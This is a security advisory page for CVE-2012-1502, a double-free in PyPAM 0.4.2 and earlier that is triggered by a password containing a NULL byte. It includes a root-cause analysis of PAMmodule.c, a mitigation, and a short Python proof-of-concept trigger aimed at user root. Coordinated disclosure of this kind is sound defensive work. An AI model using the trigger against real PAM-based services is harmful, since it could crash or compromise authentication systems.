Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2012-1502 to a friend New vulnerability? New tool? Tell us	CVE-2012-1502 PyPAM -- Python bindings for PAM - Double Free Corruption Vulnerability     Credit: The information has been provided by Markus Vervier. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2012-1502 Details Check for CVE-2012-1502 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * PyPAM version 0.4.2 and prior While conducting an internal test LSE discovered that by supplying a password containing a NULL-byte to the PyPAM module, a double-free [1] condition is triggered. This leads to undefined behaviour and may allow remote code execution. Temporary Workaround and Fix Filtering NULL-bytes in strings before passing them to the PyPAM module will mitigate the exploit. Also current GLIBC protections may prevent the double-free condition from being exploitable. It is advised to update to a fixed version of PyPAM. When PyArg_ParseTuple() in line 81 of PAMmodule.c is given a string with Null-Bytes, a TypeError exception is raised [2]. The security problem is in line 82 of PAMmodule.c where free() is called on *resp, but *resp is not set to NULL. On line 95 in libpam's v_prompt.c the _pam_drop macro calls free on the response again unless (*resp == NULL), which leads to undefined behaviour. The following PoC script triggers the problem: <--snip--> #!/usr/bin/env python ## ## python-pam 0.4.2 double free PoC ## ## 2012 Leading Security Experts GmbH ## Markus Vervier ## # -*- coding: utf-8 -*- def verify_password(user, password): import PAM def pam_conv(auth, query_list, userData): resp = [] resp.append( (password, 0)) return resp res = -3 service = 'passwd' auth = PAM.pam() auth.start(service) auth.set_item(PAM.PAM_USER, user) auth.set_item(PAM.PAM_CONV, pam_conv) try: auth.authenticate() auth.acct_mgmt() except PAM.error, resp: print 'Go away! (%s)' % resp res = -1 except: print 'Internal error' res = -2 else: print 'Good to go!' res = 0 return res print verify_password("root", "a\x00secret") <--snip--> CVE Information: 2012-1502 Disclosure Timeline: 2012-03-02 Problem discovery during internal QA 2012-03-05 Original vendor and Debian maintainer contacted 2012-03-06 Public Patch released 2012-03-07 Various maintainers contacted 2012-03-07 CVE-2012-1502 assigned 2012-03-08 LSE learned in that this bug was previously discovered and fixed in rPath Linux [3] 2012-03-08 Coordinated Advisory Release  Comments on CVE-2012-1502:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®